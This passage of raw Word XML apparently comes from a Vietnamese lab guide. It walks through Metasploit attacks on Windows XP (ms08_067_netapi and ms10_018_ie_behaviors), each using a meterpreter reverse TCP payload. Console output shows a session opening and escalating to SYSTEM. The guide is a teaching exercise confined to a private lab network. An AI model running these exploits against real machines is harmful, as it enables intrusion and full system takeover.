      <w:r w:rsidRPr="009B135C">
        <w:t>use exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="209238E0" w14:textId="21E153DD">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="2AD4DF5B" w14:textId="2DA0AD7D">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="43896CF1" w14:textId="502837B5">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set LPORT 4</w:t>
      </w:r>
      <w:r w:rsidR="69D98352">
        <w:t>252</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="0A252CF3" w14:textId="2B3DE28B">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set target 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00A2630D" w:rsidP="00A2630D" w:rsidRDefault="00A2630D" w14:paraId="64E0AF57" w14:textId="1E758BF4">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r w:rsidR="001B7BD1">
        <w:t>RHOSTS 192</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="4F3A201F" w14:textId="0028C831">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="6DF2E186" w14:textId="270D0E14">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc145594627" w:id="28"/>
      <w:r>
        <w:t xml:space="preserve">Tấn </w:t>
      </w:r>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">công </w:t>
      </w:r>
      <w:r w:rsidRPr="3CE16CD3" w:rsidR="00D05D08">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Windows XP</w:t>
      </w:r>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: ms10_018</w:t>
      </w:r>
      <w:r>
        <w:t>_ie_behaviors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="19C2D4CF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Nếu đã chạy msf6 thì không cần chạy lại lệnh sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="626AB7E1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="331D12CC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="7D66F0B3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="712D0600" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 &gt; back</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="674C1B51" w14:textId="6B46249F">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 &gt; ping 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidR="00365B7B">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="6DC0F33A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 &gt; use windows/browser/ms10_018_ie_behaviors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="1E3FDB21" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms10_018_ie_behaviors) &gt; set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="12C63990" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms10_018_ie_behaviors) &gt; set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="599B021B" w14:textId="7A0627D0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms10_018_ie_behaviors) &gt; set L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>PORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00365B7B">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>040</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="2AACB9E0" w14:textId="348902AB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00DA3E31">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms10_018_</w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00DA3E31">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>ie</w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00DA3E31">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>_behaviors) &gt; set URIPATH /test</w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="400F9F66">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>XYZ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="3F6387B6" w14:textId="608938D2">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00DA3E31">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms10_018_</w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00DA3E31">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>ie</w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00DA3E31">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">_behaviors) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00A2630D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="001B7BD1">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>RHOST 192</w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00DA3E31">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>.168.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00365B7B">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00DA3E31">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="685A39F1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00DA3E31">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms10_018_ie_behaviors) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="1449550E" w14:textId="793DAA90">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>[*] Exploit running as background job 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="08CA3421" w14:textId="269553C5">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>[*] Exploit completed, but no session was created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="69BBD55C" w14:textId="768724E0">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="7E49A601" w14:textId="2056FFFE">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>[*] Started reverse TCP handler on 192.168.1.10:4141</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="38CB4809" w14:textId="63EE1E81">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>[*] Using URL: http://192.168.1.10:8080/testXYZ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="44B01E6C" w14:textId="4F04F2D9">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>msf6 exploit(windows/browser/ms10_018_</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>ie</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>_behaviors) &gt; [*] Server started.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DDB3E4F" w:rsidP="783D5489" w:rsidRDefault="5DDB3E4F" w14:paraId="788F5F46" w14:textId="2C082B02">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="5DDB3E4F">
        <w:drawing>
          <wp:inline wp14:editId="25605512" wp14:anchorId="528961C5">
            <wp:extent cx="5943600" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1087775417" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R28b5fd9b72d94050">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1219200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0E33AEE1" w:rsidP="0E33AEE1" w:rsidRDefault="0E33AEE1" w14:paraId="31938C0C" w14:textId="563EEDF3">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0E33AEE1" w:rsidP="0E33AEE1" w:rsidRDefault="0E33AEE1" w14:paraId="24588A8D" w14:textId="7E9623CE">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="22497617" w14:textId="390D7FD0">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>Dùng</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> chức </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>năng</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> VNC </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>MobaXterm</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>hoặc</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> chức </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>năng</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> Remote Desktop </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> Windows</w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t>để</w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t>truy</w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t>xuất</w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t>từ</w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t xml:space="preserve"> xa </w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t>đến</w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t>máy</w:t>
      </w:r>
      <w:r w:rsidR="6919C64E">
        <w:rPr/>
        <w:t xml:space="preserve"> WinXP 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="4C9DEAFA" w14:textId="0AC1E328">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:drawing>
          <wp:inline wp14:editId="0F94BF95" wp14:anchorId="43E64EEC">
            <wp:extent cx="5940427" cy="2166447"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1756353188" name="Picture 1684306191" descr="A screenshot of a computer&#10;&#10;Description automatically generated" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1684306191"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Refa67fb639714c9b">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="0" t="0" r="0" b="52210"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                    <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0" flipH="0" flipV="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940427" cy="2166447"/>
                    </a:xfrm>
                    <a:prstGeom xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="0880B5A0" w14:textId="1C861F5D">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>Địa</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>chỉ</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve">: wandertour.ddns.net, </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>cổng</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>: 5110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="323239D1" w14:textId="5A9EB7FC">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve">Khi </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>vào</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> HĐH </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>WinXP</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>chạy</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> trình duyệt, </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>gõ</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> URL: http://192.168.1.10/testXYZ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="61FA6735" w14:textId="3FDC35B2">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>Trên</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>sẽ</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>xuất</w:t>
      </w:r>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t xml:space="preserve"> hiện: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0E33AEE1" w:rsidP="0E33AEE1" w:rsidRDefault="0E33AEE1" w14:paraId="405F7189" w14:textId="1032D3F2">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="76453111" w14:textId="686796EB">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>[*] 192.168.1.111    ms10_018_ie_behaviors - Sending MS10-018 Microsoft Internet Explorer DHTML Beh           aviors Use After Free (target: IE 6 SP0-SP2 (onclick))...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="2D144887" w14:textId="257A0394">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>[*] Sending stage (175686 bytes) to 192.168.1.111</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="41232312" w14:textId="5C3F2A0A">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>[*] Session ID 1 (192.168.1.10:4141 -&gt; 192.168.1.111:1796) processing InitialAutoRunScript 'post/wi           ndows/manage/priv_migrate'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="45895903" w14:textId="5DDBE3FB">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>[*] Current session process is iexplore.exe (1236) as: WINXP111\Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="71123FDD" w14:textId="481092E3">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>[*] Session is Admin but not System.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="2330E639" w14:textId="45E28723">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>[*] Will attempt to migrate to specified System level process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="2CDD5772" w14:textId="6A6CA085">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>[*] Trying services.exe (708)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="6691C2B5" w14:textId="782AE60E">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>[+] Successfully migrated to services.exe (708) as: NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
